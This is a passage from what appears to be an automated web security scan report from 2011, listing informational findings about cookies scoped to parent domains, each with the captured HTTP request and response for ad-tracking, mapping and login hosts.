Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 14:21:16 GMT

GIF89a.............!.......,........@..L..;

14.33. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=115983&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CV[km)_aRW^?69VO%^t@wc@KZSuE1Lu-->vY4Kg0Az?az^UuCpkfHEJVaJC4O@h?n0.t6VUPf:rOFre44`![.J`/(=cCACtrwdFhESV#0H@:v#%GAx/a[[bmjFt_qg$us_3LNCC#VsKXc<y<:l)8ue*S6ZaLu:suJ>!A'(fu25g[:R^v*`Go8nCr3`mcO!!Y0nygZOmn]rud_2g9`Evjg`%GgOEg#nG@zpw:oYf$UHxBK1`KkRo/.b16?^T@ES5$l%j6.YiS+'Dk]H?AlcSDn-e'vVGz>g7]v?O[krl2#^`JQ=fFGT`iWd?JWtX/7x'[R0byh((Pra?zgDswJcXMcNSV%Y?rzL?YSE?(EJP0^5AdJVLNte$gV%Gt9?Wbc75VaLc'rv_B0^w#9-o#S5e[(<(H7@KL:1xLV5r0x$KI-_S1[c(gcm^P`)bA>ESdT?7e:Vot*1Z(>C_rc2I_PIQcBF2f*sOwQVJ4*JX:0'2(8In?'J$c773Nk?ri*MFFCYw[Apvc0H^z; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly
Location: http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus
Date: Mon, 25 Apr 2011 23:45:15 GMT
Content-Length: 0


14.34. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=3&key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=95a21596c503a6a0:TM=1303779576:LM=1303779576:S=2ACplIH3-uZgJunm; expires=Thu, 25-Apr-2013 00:59:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 00:59:36 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Tue, 26 Apr 2011 00:59:36 GMT
Content-Length: 9977

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

14.35. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/vp?spn=0.026625,0.051498&z=13&key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw&mapclient=jsapi&vp=39.149918,-119.765518 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=f995d9314273e02a:TM=1303779681:LM=1303779681:S=wIvcG2ZPFmEtQJEY; expires=Thu, 25-Apr-2013 01:01:21 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=M18OfOYkwV5omExAd4jEBn8dZCPACS1weJxsEJENY1GMISMbG8ZF4UO4bMM7-uRBdfSl1dnzWVLXLvPyJgoRQbylNH5f_80UnJyJnWa6UEiytQ1uuSkfs95lc1e-GL4k; expires=Wed, 26-Oct-2011 01:01:21 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1054

GAddCopyright("m","18298887027579452616",39.1366,-119.7913,39.1632,-119.7398,13,"Google",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:39181175,w:-119838867,n:39198205,e:-11968
...[SNIP]...

14.36. http://mydownload.paretologic.safecart.com/pcha/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydownload.paretologic.safecart.com
Path:   /pcha/homepage

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pcha/homepage HTTP/1.1
Host: mydownload.paretologic.safecart.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 13:54:46 GMT
Server: Apache
Set-Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire; expires=Mon, 18-Jul-2011 05:30:46 GMT; path=/; domain=.safecart.com
Location: http://www.pchealthadvisor.com
Vary: Accept-Encoding,User-Agent
SRV-ID: web04
Connection: close
Content-Type: text/html
Content-Length: 0


14.37. https://olui2.fs.ml.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

14.38. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Tue, 24-Apr-2012 23:45:34 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 25 Apr 2011 23:45:33 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

14.39. http://pixel.intellitxt.com/pixel.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.intellitxt.com
Path:   /pixel.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1
Host: pixel.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/html
Content-Length: 1602
Date: Tue, 26 Apr 2011 14:21:08 GMT
Connection: close

(function(){try{var d=document;var u;u='http://segment-pixel.invitemedia.com/pixel?code=2773&partnerID=86&key=segment&returnType=js';if(navigator.appVersion.indexOf('MSIE')>=0 && ('complete'!=document
...[SNIP]...

14.40. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1431229252;fpan=1;fpa=P0-633902152-1303780517296;ns=0;url=http%3A%2F%2Fwww.slaviks-blog.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303780517295;tzo=300;a=p-18-mFEk4J448M;labels=type.wporg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Mon, 25-Jul-2011 01:21:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 26 Apr 2011 01:21:18 GMT
Server: QS


14.41. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?code=2759&partnerID=86&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1=eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5B5GsQ8dAQkei4HSEw3BgAvVgwf

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 26 Apr 2011 14:21:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 26-Apr-2011 14:20:49 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZoCOZi4TjYzQgkm/4zAclmIMnMcTQHyOzsYAYyT4OYh46ARM/lAInpxgBeVA0H"; Domain=invitemedia.com; expires=Wed, 25-Apr-2012 14:21:09 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=731940&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...

14.42. http://servedby.flashtalking.com/click/16008  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/16008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:06 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: flashtalkingad1="GUID=12106DCD478E8B";Path=/;Domain=.flashtalking.com;Expires=Wed, 24-Apr-13 23:44:06 GMT
pragma: no-cache
Location: http://response.firstdata.com/?elqPURLPage=15
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Type: text/plain


14.43. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

14.44. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/ HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; session=id%3D750141ed4012a61dd2504f021aabfdfe%26time%3D1303780536%26created_time%3D1303780536%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:15:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:15:39 GMT; path=/; domain=.snap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:15:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: image/gif
Content-Length: 51

GIF89a.............!.......,..........
...i.
.....;

14.45. http://shots.snap.com/preview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /preview/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /preview/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&view_id=89fdd0457a773fb9e78a2ee3e0b8ebd3&goto=Go%20to%20%25URL&direct=1&sc=2&rss=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 01:22:39 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:38 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:22:39 GMT; path=/; domain=.snap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://shots.snap.com/images/v6.59/size_305/en-us/capturing.gif
Content-Length: 0
Content-Type: text/html; charset=UTF-8


14.46. http://shots.snap.com/shot/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

